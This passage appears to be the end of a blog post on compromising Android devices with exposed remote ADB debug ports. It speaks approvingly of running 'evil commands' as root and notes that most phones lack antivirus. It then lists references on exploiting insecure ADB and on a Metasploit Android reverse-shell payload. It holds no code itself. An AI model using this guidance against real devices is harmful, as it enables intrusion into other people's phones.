There are many evil commands can be executed using adb. Just refer to https://developer.android.com/studio/command-line/adb. You can practically do anything to the android box since you are root. The great part about 0wning Android devices is that you don't have to deal with Anti-Viruses, as hardly anyone installs it on mobile devices.
References
https://www.bleepingcomputer.com/news/security/tens-of-thousands-of-android-devices-are-exposing-their-debug-port/
https://forum.xda-developers.com/android/software/guide-installing-adb-fastboot-linux-adb-t3478678
https://futurestud.io/tutorials/how-to-debug-your-android-app-over-wifi-without-root
https://medium.com/@madrobot/exploiting-android-devices-running-insecure-remote-adb-service-4490cc6a2282
https://resources.infosecinstitute.com/lab-android-exploitation-with-kali/#gref
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md
Subscribe to:
Comments (Atom)